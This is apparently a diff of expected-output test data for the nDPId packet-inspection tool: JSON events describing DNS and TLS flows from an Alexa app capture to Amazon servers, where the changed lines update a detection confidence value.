{"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -620,42 +620,42 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1490976115835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976115835,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWl5AAEARM0CsECrYrBAqAW\/GADUAQT0E1ZsBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1490976115901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976115901,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl30tAAEARrkKsECoBrBAq2AA1b8YAUeVS1ZuBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIQAENu8YtA=="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} 
